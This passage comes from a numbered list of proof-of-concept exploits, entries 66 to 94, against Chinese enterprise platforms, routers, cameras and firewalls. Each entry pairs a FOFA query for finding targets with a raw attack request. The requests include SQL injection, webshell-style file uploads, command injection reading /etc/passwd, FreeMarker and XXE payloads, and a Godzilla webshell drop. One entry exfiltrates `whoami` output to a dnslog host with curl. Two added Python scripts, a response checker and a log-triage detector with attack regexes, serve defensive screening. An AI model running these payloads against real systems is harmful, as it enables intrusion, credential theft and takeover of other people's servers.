66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Vulnerable if lines 42-43 of the response contain 6cfe798ba8e5b85feb50164c59f4bec9, the MD5 of the probe value 102103122 produced by the injected HashBytes call.

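Entries 58 and 66 both confirm the injection with a hashbytes('MD5', probe) oracle: the database computes the digest and the hex string surfaces in the page or the error text. The following is an added example, not code from the original article, that derives the expected marker from the payload actually sent and checks a response body for it. The query string is the one from entry 58; the two response bodies are constructed stand-ins for what a real check would receive over HTTP.

```python
"""Response oracle for the hashbytes('MD5', ...) probes in entries 58 and 66.
Added example; the response bodies are constructed, not captured."""
import hashlib
import re
import urllib.parse
from typing import Optional


def probe_from_payload(query_string: str) -> Optional[str]:
    """Pull the literal passed to hashbytes('MD5', ...) out of a PoC query string
    (percent-encoded or not), so the expected marker is derived from the payload
    rather than retyped by hand."""
    decoded = urllib.parse.unquote_plus(query_string)
    m = re.search(r"hashbytes\s*\(\s*'MD5'\s*,\s*'([^']*)'\s*\)", decoded, re.I)
    return m.group(1) if m else None


def expected_marker(probe: str) -> str:
    """Hex MD5 SQL Server will embed in the output. fn_varbintohexstr and
    fn_sqlvarbasetostr prefix it with 0x; the prefix is deliberately left out
    of the marker so either function's output matches."""
    return hashlib.md5(probe.encode()).hexdigest()


def check_response(body: str, probe: str) -> bool:
    """True only when the digest appears as a whole hex token, case-insensitively.
    A page that merely echoes the probe value back, or a longer hash that happens
    to contain the digest, does not count as confirmation."""
    marker = expected_marker(probe)
    return re.search(rf"(?<![0-9a-f]){marker}(?![0-9a-f])", body, re.I) is not None


# Constructed inputs: the entry 58 query string and two plausible response bodies.
ENTRY_58_QUERY = ("preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr"
                  "(hashbytes('MD5','123456')))--+")
VULNERABLE_BODY = ("Conversion failed when converting the varchar value "
                   "'0xe10adc3949ba59abbe56e057f20f883e' to data type int.")
PATCHED_BODY = "<html><body>KeyInfoList: invalid parameter 123456</body></html>"

if __name__ == "__main__":
    probe = probe_from_payload(ENTRY_58_QUERY)
    print("probe:", probe, "marker:", expected_marker(probe))
    print("vulnerable body:", check_response(VULNERABLE_BODY, probe))
    print("patched body:", check_response(PATCHED_BODY, probe))
```

The token-boundary check matters when the same probe is reused across many hosts: a response that reflects "123456" proves nothing, only the 32-character digest does.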
67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"

newdocId and the multipart filename set the name of the written file, dir the directory it is written to (../ walks out of the intended one), and fileType its extension.

POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp.
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Time-based (five-second delay). The ";.js" path-parameter suffix makes the authentication filter treat the request as a static resource while the container still routes it to the JSP.

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"

POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

The elided __VIEWSTATE value is the ViewState deserialization payload; the command it runs is carried base64-encoded in the SID header (here "type C:\Windows\win.ini").

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"

GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

Time-based (five-second delay) on the pre-authentication accId parameter.

72. 致远 OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"

POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

Decoded xmlValue:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<Signature><Field><a Index="ProtectItem">true</a><b Index="Caption">caption</b><c Index="ID">id</c><d Index="VALUE">&xxe;</d></Field></Signature>

The servlet parses xmlValue with external entities enabled, so the referenced file is read into the VALUE field and returned.

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"

POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"

PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"

GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The time value is substituted into a shell command without authentication; the backticks run ifconfig and write its output next to the CGI. Then read it back:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"

POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

UnitCode is rendered through FreeMarker: the ?new built-in instantiates freemarker.template.utility.Execute, which runs the string it is given. Then check:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 clothing management software system UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"

POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello12345678
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

Both the destination folder and the file extension are taken from the client.

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"

POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

The target field chooses the directory under the web root. Verify with:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器

GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

The path value is handed to a shell; the pipe runs id and its output is returned in the response.

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"

POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 32
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

The body is saved under the name given by report; the ../ moves it out of the report directory into the web root. Then:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视 (Uniview) video surveillance main-cgi password leak
FOFA: app="uniview-视频监控"

GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

Command 255 with an empty user name and a login handle of -1 is answered without a session and returns the account credentials.

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"

POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

The z2 value is interpolated into a shell command; the quoted "|id;" closes the argument and runs id.

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

The command to execute is supplied in the Cmd header; the elided JSON body is the connection-test payload that makes the server read it.
84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami`\")}",
  "type": "0"
}

Same FreeMarker ?new() primitive as entry 76, here through the sql field; the dnslog hostname is a placeholder for your own out-of-band listener.

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"

The exploit request below writes a Godzilla webshell:

POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

accountId is the path-traversal parameter: the elided body is written under tomcat/webapps, where Tomcat deploys it. Webshell URL: http://x.x.x.x/userfiles/index.jsp
86. tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"

POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

The host value reaches a shell: the %0a newlines break out of the ping command and ${IFS} stands in for a literal space.

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"

POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The suffix parameter is appended to the stored file name unchecked, so the file lands in the web root at /jfhatuwe.php.

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"

GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

Decoded type parameter:

echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php

The leading %0a terminates the command that type is spliced into; the written file is then served at /txzfsrur.php.

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"

POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

The path is editflow_manager.jsp with the "p" percent-encoded (.js%70) to get past the filter; a vulnerable instance reflects 24642 (111*222) in the response.

90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"

POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 47
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

jsondata[ip] is passed to the ping helper without validation, so the value runs as a command and its output comes back in the JSON response.

91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"

GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The "..;/" segment gets past the path-based access check in front of the API; fileName is then used unchecked for the traversal.

92. 海康威视 operations management center session command execution
Fastjson deserialization
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"

POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

The Testcmd header carries the command that the elided Fastjson payload executes.

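The article's stated purpose is risk screening by defenders, and the practical way to use entries 57 to 92 for that is to search access logs and proxy captures for the endpoints and payload shapes they contain. The following is an added example, not code from the original article or from any vendor named above: a small triage script with one rule per payload class (SQL injection, command injection, FreeMarker SSTI, XXE, path traversal, webshell write) plus a list of endpoint fragments copied from the PoCs. The requests in SAMPLES are constructed from entries 57, 62, 63, 72, 76, 86, 87 and 89 plus one benign request, so it runs with no network access; the Request type and rule names are assumptions of this example.

```python
"""Offline triage of logged requests against the payload patterns and endpoints
in entries 57-92. Added example for defenders; the requests in SAMPLES are
constructed from the PoCs on this page plus one benign request."""
import re
import urllib.parse
from dataclasses import dataclass


@dataclass
class Request:
    method: str
    uri: str          # path plus query string, as it appears in the access log
    body: str = ""    # empty when only an access log (no request body) is available


def normalize(text: str) -> str:
    """Percent-decode twice (catches %2527-style double encoding) and turn '+'
    into a space so that 'WAITFOR+DELAY' is matched as two words."""
    return urllib.parse.unquote_plus(urllib.parse.unquote_plus(text))


# Payload signatures, matched against the decoded request line and body together.
RULES = [
    ("sqli", re.compile(
        r"waitfor\s+delay|@@version|hashbytes\s*\(|union(?:\s+all)?\s+select", re.I)),
    ("cmd_injection", re.compile(
        # a shell metacharacter or newline followed by a recon command (62, 75, 79, 82, 86, 88) ...
        r"[|;`\n]\s*(?:id|ifconfig|ipconfig|cat|echo|whoami)(?=[\s>;&\"'$`]|$)"
        # ... or a bare command handed over as a parameter value (90)
        r"|[=&](?:ifconfig|ipconfig|whoami)(?=[&\s]|$)", re.I)),
    ("freemarker_ssti", re.compile(
        r"freemarker\.template\.utility\.Execute|<#assign\b", re.I)),
    ("xxe", re.compile(r"<!ENTITY\s+\S+\s+SYSTEM\b", re.I)),
    ("path_traversal", re.compile(r"\.\.[/\\]|\.\.;/")),
    ("webshell_write", re.compile(
        r'filename="[^"]*\.(?:jspx?|aspx?|php)"'
        r"|(?:fileType|suffix|report|filename)=[^&\s]*\.(?:jspx?|aspx?|php)\b", re.I)),
]

# Endpoint fragments copied from the PoCs above; a hit is worth a look even without a payload.
NDAY_ENDPOINTS = [
    "/tplus/UFAQD/keyEdit.aspx", "/tplus/UFAQD/KeyInfoList.aspx", "/importexport.php",
    "/ipg/static/appr/lib/flexpaper/php/view.php",
    "/ipg/appr/MApplyList/downloadFile_client/getdatarecord",
    "/EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx", "/defaultroot/wpsservlet",
    "/seeyon/m-signature/RunSignature/run/getAjaxDataServlet",
    "/service_transport/service.action", "/jmreport/testConnection",
    "/jmreport/queryFieldBySql", "/userentry", "/cgi-bin/network_test.php",
    "/webui/?g=aaa_local_web_preview", "/webui/?g=aaa_portal_auth_config_reset",
    "/sysform/003/editflow_manager.jsp", "/php/ping.php",
    "/orgManage/v1/orgs/download", "/center/api/session",
]


def triage(req: Request) -> list:
    """Return the sorted names of every rule that fires for one request."""
    decoded_uri = normalize(req.uri)
    text = decoded_uri + "\n" + normalize(req.body)
    hits = {name for name, rx in RULES if rx.search(text)}
    # Compare endpoints against the decoded path: entry 89 hides .jsp as .js%70.
    if any(endpoint in decoded_uri for endpoint in NDAY_ENDPOINTS):
        hits.add("nday_endpoint")
    return sorted(hits)


def triage_all(requests) -> dict:
    """Index -> findings for every request that triggered at least one rule."""
    return {i: hits for i, req in enumerate(requests) if (hits := triage(req))}


# Constructed samples: a benign login-page hit, then requests lifted from
# entries 57, 62, 63, 72, 76, 86, 87 and 89.
SAMPLES = [
    Request("GET", "/tplus/login.aspx?ReturnUrl=%2Ftplus%2Fdefault.aspx"),
    Request("GET", "/tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1"),
    Request("GET", "/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true"
                   '&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt'),
    Request("POST", "/ipg/appr/MApplyList/downloadFile_client/getdatarecord",
            "path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A"),
    Request("POST", "/seeyon/m-signature/RunSignature/run/getAjaxDataServlet",
            "S=ajaxColManager&M=colDelLock&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%3C%21DOCTYPE+foo+%5B"
            "%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22%3E%5D%3E"
            "%3CSignature%3E%26xxe%3B%3C%2FSignature%3E"),
    Request("POST", "/service_transport/service.action",
            '{"command": "GetFZinfo", "UnitCode": "<#assign ex = \\"freemarker.template.utility.Execute\\"'
            '?new()>${ex(\\"cmd /c whoami\\")}"}'),
    Request("POST", "/cgi-bin/network_test.php", "host=%0acat${IFS}/etc/passwd%0a&command=ping"),
    Request("POST", "/webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php",
            'Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"\r\n\r\n<?php phpinfo(); ?>'),
    Request("POST", "/sysform/003/editflow_manager.js%70", "option=2&GUID=-1'+union+select+111*222--+"),
]

if __name__ == "__main__":
    for index, findings in triage_all(SAMPLES).items():
        print(index, SAMPLES[index].method, SAMPLES[index].uri[:60], findings)
```

Two design points carry over to any real log search: decode before matching (the ;.js, .js%70 and ..%2F variants above all exist to defeat naive string filters), and keep the endpoint list separate from the payload rules, because an access log usually has no request body and the path alone is the only signal you will get for POST-based entries.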
93. 奇安信 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="

POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

The file is stored under /attachements/ with the client-supplied name; verify with:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="

POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

